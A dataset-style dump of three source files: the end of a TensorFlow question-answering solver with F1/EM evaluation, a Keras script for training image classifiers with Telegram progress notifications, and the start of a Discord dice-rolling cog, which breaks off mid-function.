logging.info('average loss of epoch {}/{} is {}'.format(ep + 1, self.epochs, ep_loss / batch_num))
data_dict = {'losses': losses, 'norms': norms,
'train_eval': train_evals, 'val_eval': val_evals}
c_time = time.strftime('%Y%m%d_%H%M', time.localtime())
data_save_path = pjoin('cache', str(iters) + 'iters' + c_time + '.npz')
np.savez(data_save_path, data_dict)
def evaluate_answer(self, sess, dataset, raw_answers, rev_vocab,
sample=(100, 100), log=False, training=False):
"""
Evaluate the model's performance using the harmonic mean of F1 and Exact Match (EM)
with the set of true answer labels
This step actually takes quite some time. So we can only sample 100 examples
from either training or testing set.
:param session: session should always be centrally managed in train.py
:param dataset: a representation of our data, in some implementations, you can
pass in multiple components (arguments) of one dataset to this function
:param sample: how many examples in dataset we look at
:param log: whether we print to std out stream
:return:
"""
if not isinstance(rev_vocab, np.ndarray):
rev_vocab = np.array(rev_vocab)
if not isinstance(sample, tuple):
sample = (sample, sample)
tf1 = 0.
tem = 0.
input_batch_size = 100
if training:
train_len = sample[0]
train_context = dataset['train_context'][:train_len]
train_question = dataset['train_question'][:train_len]
train_answer = raw_answers['raw_train_answer'][:train_len]
train_a_s = np.array([], dtype=np.int32)
train_a_e = np.array([], dtype=np.int32)
for i in tqdm(range(train_len // input_batch_size), desc='trianing set'):
train_as, train_ae = self.answer(self.model, sess,
np.array(train_context[i * input_batch_size:(i + 1) * input_batch_size]),
np.array(train_question[i * input_batch_size:(i + 1) * input_batch_size]))
train_a_s = np.concatenate((train_a_s, train_as), axis=0)
train_a_e = np.concatenate((train_a_e, train_ae), axis=0)
# a_s and a_e -> (sample_num)
for i in range(train_len):
prediction_ids = train_context[i][0][train_a_s[i]:train_a_e[i]+1]
prediction_answer = ' '.join(rev_vocab[prediction_ids])
raw_answer = train_answer[i]
tf1 += f1_score(prediction_answer, raw_answer)
tem += exact_match_score(prediction_answer, raw_answer)
# if i < 10:
# print("predict_answer: ", prediction_answer)
# print("ground truth: ", raw_answer)
# print ("f1: ", f1_score(prediction_answer, raw_answer))
if log:
logging.info("Training set ==> F1: {}, EM: {}, for {} samples".
format(tf1 / train_len, tem / train_len, train_len))
f1 = 0.
em = 0.
val_len = sample[1]
val_context = dataset['val_context'][:val_len]
val_question = dataset['val_question'][:val_len]
val_answer = raw_answers['raw_val_answer'][:val_len]
val_a_s = np.array([], dtype=np.int32)
val_a_e = np.array([], dtype=np.int32)
for i in tqdm(range(val_len // input_batch_size), desc='val set'):
val_as, val_ae = self.answer(self.model, sess,
np.array(val_context[i * input_batch_size:(i + 1) * input_batch_size]),
np.array(val_question[i * input_batch_size:(i + 1) * input_batch_size]))
val_a_s = np.concatenate((val_a_s, val_as), axis=0)
val_a_e = np.concatenate((val_a_e, val_ae), axis=0)
# a_s and a_e -> (sample_num)
for i in range(val_len):
prediction_ids = val_context[i][0][val_a_s[i]:val_a_e[i]+1]
prediction_answer = ' '.join(rev_vocab[prediction_ids])
raw_answer = val_answer[i]
f1 += f1_score(prediction_answer, raw_answer)
em += exact_match_score(prediction_answer, raw_answer)
# if i < 10:
# print("predict_answer: ", prediction_answer)
# print("ground truth: ", raw_answer)
# print ("f1: ", f1_score(prediction_answer, raw_answer))
if log:
logging.info("val set ==> F1: {}, EM: {}, for {} samples".
format(f1 / val_len, em / val_len, val_len))
if training:
return tf1/train_len, tem/train_len, f1/val_len, em/val_len
else:
return f1/val_len, em/val_len
def answer(self, model, session, context, question):
"""
Returns the probability distribution over different positions in the paragraph
so that other methods like self.answer() will be able to work properly
:return:
"""
input_feed = {}
input_feed[model.context] = context[:, 0, :]
input_feed[model.context_m] = context[:, 1, :]
input_feed[model.question] = question[:, 0, :]
input_feed[model.question_m] = question[:, 1, :]
output_feed = [model.s_score, model.e_score]
s_score, e_score = session.run(output_feed, input_feed)
a_s = np.argmax(s_score, axis=1)
a_e = np.argmax(e_score, axis=1)
return a_s, a_e
def load_input_feed(self, context, question, answer):
model = self.model
input_feed = {}
input_feed[model.context] = context[:, 0, :]
input_feed[model.context_m] = context[:, 1, :]
input_feed[model.question] = question[:, 0, :]
input_feed[model.question_m] = question[:, 1, :]
input_feed[model.answer_s] = answer[:, 0]
input_feed[model.answer_e] = answer[:, 1]
input_feed[model.starter_learning_rate] = self.start_lr
return input_feed
| jeffrey1hu/context-based-qa-system | core/solver.py | solver.py | py | 12,925 | python | en | code | 3 | github-code | 1 | [
{
"api_name": "tensorflow.train",
"line_number": 41,
"usage_type": "attribute"
},
{
"api_name": "tensorflow.Variable",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "tensorflow.placeholder",
"line_number": 44,
"usage_type": "call"
},
{
"api_name": "tens... |
3018933371 | # -*- coding: utf-8 -*-
"""
Training deep convolutional neural networks.
Created on Thu Jul 5 11:00:00 2018
Author: Prasun Roy | CVPRU-ISICAL (http://www.isical.ac.in/~cvpr)
GitHub: https://github.com/prasunroy/cnn-on-degraded-images
"""
# imports
from __future__ import division
from __future__ import print_function
import glob
import json
import numpy
import os
import tensorflow
from keras import applications
from keras import optimizers
from keras.callbacks import CSVLogger
from keras.callbacks import EarlyStopping
from keras.callbacks import ModelCheckpoint
from keras.callbacks import TensorBoard
from keras.layers import Dense
from keras.layers import Dropout
from keras.layers import Flatten
from keras.models import Model
from keras.preprocessing.image import ImageDataGenerator
from matplotlib import pyplot
from libs.PipelineUtils import shutdown
from mlutils.callbacks import Telegram
# configurations
# -----------------------------------------------------------------------------
PROCESS_SEED = None
ARCHITECTURE = 'inceptionv3'
INCLUDE_TOPL = False
WEIGHTS_INIT = 'imagenet'
INPUT_TENSOR = None
INPUT_DSHAPE = (299, 299, 3)
POOLING_TYPE = None
NUM_TCLASSES = 10
FREEZE_LAYER = 0
NEURONS_FC_1 = 1024
NEURONS_FC_2 = 1024
DROPOUT_FC12 = 0.5
FN_OPTIMIZER = optimizers.sgd(lr=0.0001, momentum=0.5)
DATASET_ID = 'synthetic_digits'
DATA_TRAIN = 'data/{}/imgs_train/'.format(DATASET_ID)
DATA_VALID = 'data/{}/imgs_valid/'.format(DATASET_ID)
LABEL_MAPS = 'data/{}/labelmap.json'.format(DATASET_ID)
SAVE_AUGMT = False
BATCH_SIZE = 50
NUM_EPOCHS = 100
OUTPUT_DIR = 'output/{}/{}/'.format(DATASET_ID, ARCHITECTURE)
AUTH_TOKEN = None
TELCHAT_ID = None
F_SHUTDOWN = False
# -----------------------------------------------------------------------------
# setup seed for random number generators for reproducibility
numpy.random.seed(PROCESS_SEED)
tensorflow.set_random_seed(PROCESS_SEED)
# setup paths for augmented data
if SAVE_AUGMT:
aug_dir_train = os.path.join(OUTPUT_DIR, 'augmented_data/imgs_train/')
aug_dir_valid = os.path.join(OUTPUT_DIR, 'augmented_data/imgs_valid/')
else:
aug_dir_train = None
aug_dir_valid = None
# setup paths for model architecture
mdl_dir = os.path.join(OUTPUT_DIR, 'models')
mdl_file = os.path.join(mdl_dir, '{}.json'.format(ARCHITECTURE))
# setup paths for callbacks
log_dir = os.path.join(OUTPUT_DIR, 'logs')
cpt_dir = os.path.join(OUTPUT_DIR, 'checkpoints')
tbd_dir = os.path.join(OUTPUT_DIR, 'tensorboard')
log_file = os.path.join(log_dir, 'training.csv')
cpt_best = os.path.join(cpt_dir, '{}_best.h5'.format(ARCHITECTURE))
cpt_last = os.path.join(cpt_dir, '{}_last.h5'.format(ARCHITECTURE))
# validate paths
def validate_paths():
flag = True
data_dirs = [DATA_TRAIN, DATA_VALID]
for directory in data_dirs:
if not os.path.isdir(directory):
print('[INFO] Data directory not found at {}'.format(directory))
flag = False
output_dirs = [OUTPUT_DIR, aug_dir_train, aug_dir_valid, mdl_dir, log_dir, cpt_dir, tbd_dir]
output_dirs = [directory for directory in output_dirs if directory is not None]
for directory in output_dirs:
if not os.path.isdir(directory):
os.makedirs(directory)
elif len(glob.glob(os.path.join(directory, '*.*'))) > 0:
print('[INFO] Output directory {} must be empty'.format(directory))
flag = False
return flag
# load data
def load_data():
# image data generator configuration for training data augmentation
data_gen_train = ImageDataGenerator(featurewise_center=False,
samplewise_center=False,
featurewise_std_normalization=False,
samplewise_std_normalization=False,
zca_whitening=False,
zca_epsilon=1e-06,
rotation_range=0.0,
width_shift_range=0.0,
height_shift_range=0.0,
brightness_range=None,
shear_range=0.0,
zoom_range=0.0,
channel_shift_range=0.0,
fill_mode='nearest',
cval=0.0,
horizontal_flip=False,
vertical_flip=False,
rescale=1.0/255.0,
preprocessing_function=None,
data_format=None,
validation_split=0.0)
# image data generator configuration for validation data augmentation
data_gen_valid = ImageDataGenerator(featurewise_center=False,
samplewise_center=False,
featurewise_std_normalization=False,
samplewise_std_normalization=False,
zca_whitening=False,
zca_epsilon=1e-06,
rotation_range=0.0,
width_shift_range=0.0,
height_shift_range=0.0,
brightness_range=None,
shear_range=0.0,
zoom_range=0.0,
channel_shift_range=0.0,
fill_mode='nearest',
cval=0.0,
horizontal_flip=False,
vertical_flip=False,
rescale=1.0/255.0,
preprocessing_function=None,
data_format=None,
validation_split=0.0)
# training image data generator
data_flow_train = data_gen_train.flow_from_directory(directory=DATA_TRAIN,
target_size=INPUT_DSHAPE[:-1],
color_mode='rgb',
classes=None,
class_mode='categorical',
batch_size=BATCH_SIZE,
shuffle=True,
seed=PROCESS_SEED,
save_to_dir=aug_dir_train,
save_prefix='',
save_format='png',
follow_links=False,
subset=None,
interpolation='nearest')
# validation image data generator
data_flow_valid = data_gen_valid.flow_from_directory(directory=DATA_VALID,
target_size=INPUT_DSHAPE[:-1],
color_mode='rgb',
classes=None,
class_mode='categorical',
batch_size=BATCH_SIZE,
shuffle=True,
seed=PROCESS_SEED,
save_to_dir=aug_dir_valid,
save_prefix='',
save_format='png',
follow_links=False,
subset=None,
interpolation='nearest')
return (data_flow_train, data_flow_valid)
# build model
def build_model():
model = None
# create architecture
if ARCHITECTURE.lower() == 'inceptionv3':
model = applications.inception_v3.InceptionV3(include_top=INCLUDE_TOPL, weights=WEIGHTS_INIT, input_tensor=INPUT_TENSOR, input_shape=INPUT_DSHAPE, pooling=POOLING_TYPE, classes=NUM_TCLASSES)
elif ARCHITECTURE.lower() == 'mobilenet':
model = applications.mobilenet.MobileNet(include_top=INCLUDE_TOPL, weights=WEIGHTS_INIT, input_tensor=INPUT_TENSOR, input_shape=INPUT_DSHAPE, pooling=POOLING_TYPE, classes=NUM_TCLASSES)
elif ARCHITECTURE.lower() == 'resnet50':
model = applications.resnet50.ResNet50(include_top=INCLUDE_TOPL, weights=WEIGHTS_INIT, input_tensor=INPUT_TENSOR, input_shape=INPUT_DSHAPE, pooling=POOLING_TYPE, classes=NUM_TCLASSES)
elif ARCHITECTURE.lower() == 'vgg16':
model = applications.vgg16.VGG16(include_top=INCLUDE_TOPL, weights=WEIGHTS_INIT, input_tensor=INPUT_TENSOR, input_shape=INPUT_DSHAPE, pooling=POOLING_TYPE, classes=NUM_TCLASSES)
elif ARCHITECTURE.lower() == 'vgg19':
model = applications.vgg19.VGG19(include_top=INCLUDE_TOPL, weights=WEIGHTS_INIT, input_tensor=INPUT_TENSOR, input_shape=INPUT_DSHAPE, pooling=POOLING_TYPE, classes=NUM_TCLASSES)
if not model is None:
# freeze layers
if FREEZE_LAYER < 0:
for layer in model.layers:
layer.trainable = False
else:
for layer in model.layers[:FREEZE_LAYER]:
layer.trainable = False
# add fully connected layers
if not INCLUDE_TOPL:
x = model.output
x = Flatten()(x)
x = Dense(NEURONS_FC_1, activation='relu')(x)
x = Dropout(DROPOUT_FC12)(x)
x = Dense(NEURONS_FC_2, activation='relu')(x)
y = Dense(NUM_TCLASSES, activation='softmax')(x)
# final architecture
model_final = Model(inputs=model.input, outputs=y)
else:
model_final = model
# compile the final model
model_final.compile(optimizer=FN_OPTIMIZER, loss='categorical_crossentropy', metrics=['accuracy'])
return model_final
# create callbacks
def callbacks():
    """Assemble the list of Keras training callbacks.

    Order matters: the Telegram notifier must stay last because train()
    addresses it as cb_list[-1].
    """
    return [
        CSVLogger(filename=log_file, append=True),
        EarlyStopping(monitor='val_loss', min_delta=0, patience=10, verbose=1),
        ModelCheckpoint(filepath=cpt_best, monitor='val_acc', save_best_only=True, save_weights_only=True, verbose=1),
        ModelCheckpoint(filepath=cpt_last, monitor='val_acc', save_best_only=False, save_weights_only=True, verbose=0),
        TensorBoard(log_dir=tbd_dir, batch_size=BATCH_SIZE, write_grads=True, write_images=True),
        Telegram(auth_token=AUTH_TOKEN, chat_id=TELCHAT_ID, monitor='val_acc', out_dir=OUTPUT_DIR),
    ]
# plot learning curve
def plot(train_history):
    """Plot and save the loss and accuracy learning curves.

    :param train_history: History object returned by model.fit_generator
    """
    history = train_history.history
    # (train key, validation key, title, y-label, output file name)
    curve_specs = [
        ('loss', 'val_loss', 'Training and Validation Loss', 'loss', 'plot_loss.png'),
        ('acc', 'val_acc', 'Training and Validation Accuracy', 'accuracy', 'plot_accuracy.png'),
    ]
    for train_key, valid_key, title, ylabel, filename in curve_specs:
        pyplot.figure()
        pyplot.plot(history[train_key], label=train_key)
        pyplot.plot(history[valid_key], label=valid_key)
        pyplot.title(title)
        pyplot.xlabel('epoch')
        pyplot.ylabel(ylabel)
        pyplot.legend()
        pyplot.savefig(os.path.join(log_dir, filename))
        pyplot.show(block=False)
    return
# train model
# train model
def train():
    """Run the full training pipeline.

    Validates paths, loads the data generators, saves the class labelmap,
    builds and serializes the model, trains it with the configured
    callbacks, and plots the learning curves.
    """
    # validate paths; abort early if the expected directories are missing
    if not validate_paths():
        return
    # load data generators (train + validation)
    (data_flow_train, data_flow_valid) = load_data()
    # save labelmap (class name -> index) for reuse at inference time
    with open(LABEL_MAPS, 'w') as file:
        json.dump(data_flow_train.class_indices, file)
    print('[INFO] Created labelmap')
    # build model; build_model() returns None on an unknown architecture
    print('[INFO] Building model... ', end='')
    model = build_model()
    if model is None:
        print('failed')
        return
    else:
        print('done')
    model.summary()
    # serialize model to json so the architecture can be reloaded later
    model_json = model.to_json()
    with open(mdl_file, 'w') as file:
        file.write(model_json)
    # create callbacks (the Telegram notifier is last in the list)
    cb_list = callbacks()
    # acknowledgement: notify the Telegram chat that training started
    # NOTE(review): relies on private members of the Telegram callback
    # (`_task_id`, `_send_message`) -- confirm these stay stable
    data = {'chat_id': TELCHAT_ID,
            'text': '`Received a new training request.\nTASK ID: {}\nMODEL : {}\nDATASET: {}`'\
            .format(cb_list[-1]._task_id, ARCHITECTURE.upper(), DATASET_ID.upper()),
            'parse_mode': 'Markdown'}
    cb_list[-1]._send_message(data)
    # train model
    train_history = model.fit_generator(generator=data_flow_train,
                                        steps_per_epoch=None,
                                        epochs=NUM_EPOCHS,
                                        verbose=1,
                                        callbacks=cb_list,
                                        validation_data=data_flow_valid,
                                        validation_steps=None,
                                        class_weight=None,
                                        max_queue_size=10,
                                        workers=1,
                                        use_multiprocessing=False,
                                        shuffle=True,
                                        initial_epoch=0)
    # plot learning curve
    plot(train_history)
    return
# main
if __name__ == '__main__':
    # run the full training pipeline
    train()
    # optionally power the machine off once training finishes
    if F_SHUTDOWN:
        shutdown()
| prasunroy/cnn-on-degraded-images | train_deepcnn.py | train_deepcnn.py | py | 14,364 | python | en | code | 14 | github-code | 1 | [
{
"api_name": "keras.optimizers.sgd",
"line_number": 53,
"usage_type": "call"
},
{
"api_name": "keras.optimizers",
"line_number": 53,
"usage_type": "name"
},
{
"api_name": "numpy.random.seed",
"line_number": 72,
"usage_type": "call"
},
{
"api_name": "numpy.random"... |
39159734260 | """Utilities shared across the whole cog"""
# Built-in
import random
import re
# Third-party
from discord import Color
# Local
from .embed import create_embed, create_error_embed
from .settings import DEFAULT_USER_SETTINGS
# --------------------------------------------------------------------------------
# > Constants
# --------------------------------------------------------------------------------
# e.g. "2d6": 1-999 dice with 1-999 sides each
DICE_REGEX = re.compile(r"(?P<qty>[1-9]\d{0,2})d(?P<sides>[1-9]\d{0,2})")
# parameter-less actions: advantage, disadvantage, critical hit
SIMPLE_ACTION_REGEX = re.compile(r"adv|dis|crit")
# keep/drop actions with an amount, e.g. "kh3" (keep highest 3)
COMPLEX_ACTION_REGEX = re.compile(r"(?P<action>dl|dh|kl|kh)(?P<value>[1-9]\d{0,2})")
# roll checks, e.g. ">=15" (note: "=" means equality here)
CHECK_REGEX = re.compile(r"(?P<comparator>=|!=|>|<|>=|<=)(?P<value>[1-9]\d{0,4})")
# flat modifiers, e.g. "+5" or "-12"
MODIFIER_REGEX = re.compile(r"[-+][1-9]\d{0,4}")
# --------------------------------------------------------------------------------
# > Base helpers
# --------------------------------------------------------------------------------
def generate_discord_markdown_string(lines):
    """
    Wraps a list of messages inside a Discord markdown code block
    :param [str] lines:
    :return: The wrapped string
    :rtype: str
    """
    return "\n".join(["```markdown", *lines, "```"])
class Die:
    """A single die with a configurable number of sides."""

    def __init__(self, sides):
        """
        Creates a die of N sides that can be rolled
        :param int sides: Number of sides the die have
        """
        self.sides = sides
        self.value = None  # populated by roll()

    def roll(self):
        """
        Rolls the die, stores the result, and returns it
        :rtype: int
        """
        result = random.randint(1, self.sides)
        self.value = result
        return result

    def copy(self):
        """
        Returns a new Die with the same side count and current value
        :rtype: Die
        """
        clone = Die(self.sides)
        clone.value = self.value
        return clone
class RollComponent:
    """Provides the skeleton for a DiceRoll component.

    Subclasses must override validate(), apply(), and update_embed().
    Fix: the original base methods called `NotImplemented()`, which raises
    a confusing TypeError ('NotImplementedType' object is not callable);
    they now raise NotImplementedError, the intended idiom.
    """

    def __init__(self, dice_roll):
        """
        Initializes the component
        :param DiceRoll dice_roll: The DiceRoll instance the component is linked to
        """
        self.dice_roll = dice_roll
        self.errors = []  # validation error messages, filled by validate()

    def validate(self):
        """Should fill the `errors` property"""
        raise NotImplementedError

    def apply(self):
        """Should update the `dice_roll.total`"""
        raise NotImplementedError

    def update_embed(self, embed):
        """
        Should add a field and content to an existing embed
        :param Embed embed: An existing discord Embed message
        """
        raise NotImplementedError
# --------------------------------------------------------------------------------
# > Modifier Component
# --------------------------------------------------------------------------------
class RollModifier(RollComponent):
    """Applies a flat modifier at the end of your DiceRoll"""

    def __init__(self, dice_roll, value):
        """
        Initializes the instance
        :param DiceRoll dice_roll: The DiceRoll instance to link it to
        :param int value: The modifier amount (can be negative)
        """
        super().__init__(dice_roll)
        self.value = value

    def validate(self):
        """Flags a zero modifier as invalid"""
        if not self.value:
            self.errors.append("[Modifier] Cannot have a modifier of 0")

    def apply(self):
        """Adds the modifier value to the DiceRoll total"""
        self.dice_roll.total = self.dice_roll.total + self.value

    def update_embed(self, embed):
        """
        Adds a field showing the total before and after the modifier
        :param Embed embed: The embed message to update
        """
        if not self.dice_roll.settings["verbose"]:
            return
        sign, abs_value = ("+", self.value) if self.value > 0 else ("-", -self.value)
        previous_total = self.dice_roll.total - self.value
        message = f"# {previous_total} {sign} {abs_value} = {self.dice_roll.total}"
        embed.add_field(
            name=f"Modifier {sign}{abs_value}",
            value=generate_discord_markdown_string([message]),
            inline=False,
        )
# --------------------------------------------------------------------------------
# > Check Component
# --------------------------------------------------------------------------------
class RollCheck(RollComponent):
    """Performs a check at the very end of your DiceRoll"""

    # Maps each comparator token (as allowed by CHECK_REGEX) to its
    # comparison function.
    # Fix: the original used eval() on the comparator, which is unsafe and
    # actually crashed with a SyntaxError for the "=" comparator
    # (eval("10 = 5") is an invalid assignment); "=" now means equality.
    _COMPARISONS = {
        "=": lambda total, value: total == value,
        "!=": lambda total, value: total != value,
        ">": lambda total, value: total > value,
        "<": lambda total, value: total < value,
        ">=": lambda total, value: total >= value,
        "<=": lambda total, value: total <= value,
    }

    def __init__(self, dice_roll, comparator, value):
        """
        Initializes the instance
        :param DiceRoll dice_roll: The DiceRoll instance to link it to
        :param str comparator: Comparaison that will be used, like > or <=
        :param int value: The value on the right side of the equation
        """
        super().__init__(dice_roll)
        self.comparator = comparator
        self.value = value
        self.success = None  # set by apply()

    def validate(self):
        """Nothing to validate. Already done by the regex in DiceRoll"""
        pass

    def apply(self):
        """Compares the DiceRoll total to the provided value, using the comparator"""
        compare = self._COMPARISONS[self.comparator]
        self.success = compare(self.dice_roll.total, self.value)

    def update_embed(self, embed):
        """
        Updates the title and color of the message based on the check results
        :param Embed embed: The embed message to update
        """
        if self.success:
            color = Color.green()
            title = f"Success with {self.dice_roll.total}!"
        else:
            color = Color.orange()
            title = f"Failure with {self.dice_roll.total}!"
        embed.title = title
        embed.color = color
# --------------------------------------------------------------------------------
# > Action Component
# --------------------------------------------------------------------------------
def create_roll_action(dice_roll, name, value=0):
    """
    Creates and returns the matching action using the right parameters
    :param DiceRoll dice_roll: The DiceRoll instance to link it to
    :param str name: Name or shortcut of the action
    :param int value: Value associated with the action
    :return: The created BaseAction that matches the provided name
    :rtype: BaseAction
    """
    # Parameter-less actions
    simple_actions = {"adv": Advantage, "dis": Disadvantage, "crit": CriticalHit}
    if name in simple_actions:
        return simple_actions[name](dice_roll)
    # Keep/drop actions: (keep, high) flags per shortcut
    keep_drop_flags = {
        "dl": (False, False),
        "dh": (False, True),
        "kl": (True, False),
        "kh": (True, True),
    }
    keep, high = keep_drop_flags[name]  # KeyError on unknown name, as before
    return KeepDropAction(dice_roll, value, keep, high)
class BaseAction(RollComponent):
    """Base class to provide utilities to all actual Actions"""

    name = None  # overridden by each concrete action

    def __init__(self, dice_roll):
        """
        Initializes the action
        :param DiceRoll dice_roll: The DiceRoll instance to link it to
        """
        super().__init__(dice_roll)
        self.dice_roll = dice_roll

    def _validate_one_die(self):
        """Adds an error unless exactly one die is being rolled"""
        if len(self.dice_roll.dice) != 1:
            self.errors.append(
                f"[Action] `{self.name}` action can only be used with 1 die."
            )

    def _validate_one_die_type(self):
        """Adds an error when the dice do not all share the same size"""
        distinct_sides = {die.sides for die in self.dice_roll.dice}
        if len(distinct_sides) > 1:
            self.errors.append(
                f"[Action] `{self.name}` action cannot be used with dice of different sizes."
            )
class Advantage(BaseAction):
    """Action to roll a second die and keep the best one"""

    name = "Advantage"

    def __init__(self, dice_roll):
        """
        Initializes the action and its state
        :param DiceRoll dice_roll: The DiceRoll instance to link it to
        """
        super().__init__(dice_roll)
        self.existing_die = None
        self.die = None

    def validate(self):
        """Checks if the DiceRoll only has one die"""
        self._validate_one_die()

    def apply(self):
        """Copies the existing die, re-rolls it, and keeps the higher result"""
        self.existing_die = self.dice_roll.dice[0]
        self.die = self.existing_die.copy()
        new_value = self.die.roll()
        if new_value > self.existing_die.value:
            self.dice_roll.total = new_value

    def update_embed(self, embed):
        """
        Adds a field with the action result
        :param Embed embed: Embed message to update
        """
        if not self.dice_roll.settings["verbose"]:
            return
        outcome = "kept" if self.die.value > self.existing_die.value else "discarded"
        result = f"Rolled {self.die.value} and {outcome} it!"
        embed.add_field(
            name=self.name,
            value=generate_discord_markdown_string([result]),
            inline=False,
        )
class Disadvantage(BaseAction):
    """Action to roll a second die and keep the worse one"""

    name = "Disadvantage"

    def __init__(self, dice_roll):
        """
        Initializes the action and its state
        :param DiceRoll dice_roll: The DiceRoll instance to link it to
        """
        super().__init__(dice_roll)
        self.existing_die = None
        self.die = None

    def validate(self):
        """Checks if the DiceRoll only has one die"""
        self._validate_one_die()

    def apply(self):
        """Copies the existing die, re-rolls it, and keeps the lower result"""
        self.existing_die = self.dice_roll.dice[0]
        self.die = self.existing_die.copy()
        new_value = self.die.roll()
        if new_value < self.existing_die.value:
            self.dice_roll.total = new_value

    def update_embed(self, embed):
        """
        Adds a field with the action result
        :param Embed embed: Embed message to update
        """
        if not self.dice_roll.settings["verbose"]:
            return
        outcome = "kept" if self.die.value < self.existing_die.value else "discarded"
        result = f"Rolled {self.die.value} and {outcome} it!"
        embed.add_field(
            name=self.name,
            value=generate_discord_markdown_string([result]),
            inline=False,
        )
class CriticalHit(BaseAction):
    """Action to make a critical hit and double your dice/damage output"""

    name = "Critical hit"

    def validate(self):
        """Nothing to validate"""
        return

    def apply(self):
        """Doubles the current dice total, keeping before/after for display"""
        self.before_total = self.dice_roll.total
        self.after_total = self.before_total * 2
        self.dice_roll.total = self.after_total

    def update_embed(self, embed):
        """
        Adds a field indicating the new total
        :param Embed embed: Embed message to update
        """
        if not self.dice_roll.settings["verbose"]:
            return
        messages = [
            "All your dice scores are multiplied by 2",
            f"# {self.before_total} x 2 = {self.after_total}",
        ]
        embed.add_field(
            name=self.name,
            value=generate_discord_markdown_string(messages),
            inline=False,
        )
class KeepDropAction(BaseAction):
    """Action to keep or drop dice.

    Fix: the original implementation inverted the slices for the
    "keep low" and "drop low" cases ("kl2" kept everything EXCEPT the two
    lowest dice, and "dl2" kept ONLY the two lowest dice).
    """

    def __init__(self, dice_roll, amount, keep, high):
        """
        Initializes the action and its state
        :param DiceRoll dice_roll: The DiceRoll instance to link it to
        :param int amount: Amount of dice to keep or drop
        :param bool keep: Whether we keep (or drop)
        :param bool high: Whether the targeted dice are the highest (or lowest)
        """
        super().__init__(dice_roll)
        self.remaining_dice = []
        self.discarded_dice = []
        self.amount = amount
        self.keep = keep
        self.high = high
        self.name = self._compute_name()

    def validate(self):
        """Checks the dice count and types"""
        self._validate_one_die_type()
        self._validate_drop_keep_count(self.amount)

    def apply(self):
        """
        Keeps/drops the dice by splitting them into `remaining` and `discarded`
        then updates the total using the `remaining` dice only.
        Sorting with `reverse=self.high` puts the targeted dice first, so the
        first `amount` dice are always the ones kept (or dropped).
        """
        dice = sorted(self.dice_roll.dice, key=lambda die: die.value, reverse=self.high)
        if self.keep:
            self.remaining_dice = dice[: self.amount]
            self.discarded_dice = dice[self.amount :]
        else:
            self.discarded_dice = dice[: self.amount]
            self.remaining_dice = dice[self.amount :]
        self.before_total = self.dice_roll.total
        self.dice_roll.total = sum(die.value for die in self.remaining_dice)
        self.after_total = self.dice_roll.total

    def update_embed(self, embed):
        """
        Adds a field which list the discarded and remaining dice
        :param Embed embed: The embed message to update
        """
        if not self.dice_roll.settings["verbose"]:
            return
        remaining_values = [str(die.value) for die in self.remaining_dice]
        discarded_values = [str(die.value) for die in self.discarded_dice]
        messages = [
            f"[Discarded dice]({', '.join(discarded_values)})",
            f"[Remaining dice]({', '.join(remaining_values)})",
            f"Went down from {self.before_total} to {self.after_total}",
        ]
        text = generate_discord_markdown_string(messages)
        embed.add_field(
            name=self.name,
            value=text,
            inline=False,
        )

    def _compute_name(self):
        """
        :return: Computes and returns the action name based on its attributes
        :rtype: str
        """
        verb = "Keep" if self.keep else "Drop"
        direction = "high" if self.high else "low"
        return f"{verb} {direction} {self.amount}"

    def _validate_drop_keep_count(self, n):
        """
        Adds an error if we cannot drop/keep that many dice
        :param int n: Number of dice to drop/keep
        """
        dice_count = len(self.dice_roll.dice)
        if dice_count <= n:
            # Fixed message: report the actual dice count, not `n` twice
            message = f"[Action] You must roll more dice (`{dice_count}`) than what you drop/keep (`{n}`)."
            self.errors.append(message)
# --------------------------------------------------------------------------------
# > Dice Roll
# --------------------------------------------------------------------------------
class DiceRoll:
    """The state and action of rolling dice with various options"""
    def __init__(self, instructions, settings):
        """
        Initializes the state, then parses and validates the instructions
        :param [str] instructions: The user's instructions, like "1d6" or "adv"
        :param dict settings: The settings to use in this roll
        """
        self.instructions = instructions
        # User-provided settings override the defaults
        self.settings = {**DEFAULT_USER_SETTINGS, **settings}
        # Roll parameters (at most one action, modifier, and check each)
        self.dice = []
        self.modifier = None
        self.action = None
        self.check = None
        # Results
        self.total = 0
        self.rolled = False
        # Error control: counters detect duplicate declarations
        self.action_counter = 0
        self.check_counter = 0
        self.modifier_counter = 0
        self._errors = []
        # Parsing
        self._parse_instructions()
        self._validate()
    # ----------------------------------------
    # API properties
    # ----------------------------------------
    @property
    def components(self):
        """
        :return: The ordered component instances linked to our DiceRoll
        :rtype: [RollComponent]
        """
        # Order matters: action changes the total, then modifier, then check
        potential_components = [self.action, self.modifier, self.check]
        return [c for c in potential_components if c is not None]
    @property
    def is_valid(self):
        """
        :return: Whether the instance is valid and can be played
        :rtype: bool
        """
        return len(self.errors) == 0
    @property
    def errors(self):
        """
        :return: The instance's and its components' errors
        :rtype: [str]
        """
        component_errors = []
        for component in self.components:
            component_errors.extend(component.errors)
        return self._errors + component_errors
    @property
    def errors_as_embed(self):
        """
        :return: Formats the errors into a Discord Embed
        :rtype: Embed
        """
        description = "\n".join(self.errors)
        return create_error_embed(description=description)
    @property
    def result_as_embed(self):
        """
        :return: Formats our instance's result into a Discord Embed
        :rtype: Embed
        """
        title = f"You rolled {self.total}"
        embed = create_embed(title=title)
        if self.settings["verbose"]:
            self._update_embed_with_dice_rolls(embed)
        for component in self.components:
            # "verbose" is handled individually in each component
            component.update_embed(embed)
        return embed
    # ----------------------------------------
    # API methods
    # ----------------------------------------
    def roll(self):
        """
        If valid: rolls the dice, applies all components, and returns the results
        Else: returns the errors
        :return: The embed results or errors
        :rtype: Embed
        :raises RuntimeError: If this instance was already rolled once
        """
        # Maybe skip
        if self.rolled:
            raise RuntimeError("This DiceRoll has already been rolled")
        if not self.is_valid:
            return self.errors_as_embed
        # Do roll: sum the raw dice first, then let components adjust the total
        for die in self.dice:
            self.total += die.roll()
        for component in self.components:
            component.apply()
        self.rolled = True
        return self.result_as_embed
    def copy(self):
        """
        :return: A new DiceRoll using our instance's instructions and settings
        :rtype: DiceRoll
        """
        return DiceRoll(self.instructions, self.settings)
    # ----------------------------------------
    # Helpers: parsing
    # ----------------------------------------
    def _parse_instructions(self):
        """Tries to parse all instruction using our regexes"""
        parsing_functions = [
            self._maybe_parse_dice,
            self._maybe_parse_action,
            self._maybe_parse_modifier,
            self._maybe_parse_check,
        ]
        # Each instruction is matched against the parsers in order;
        # the for/else adds an error when no parser recognized it
        for instruction in self.instructions:
            for parsing_func in parsing_functions:
                if parsing_func(instruction):
                    break
            else:
                message = (
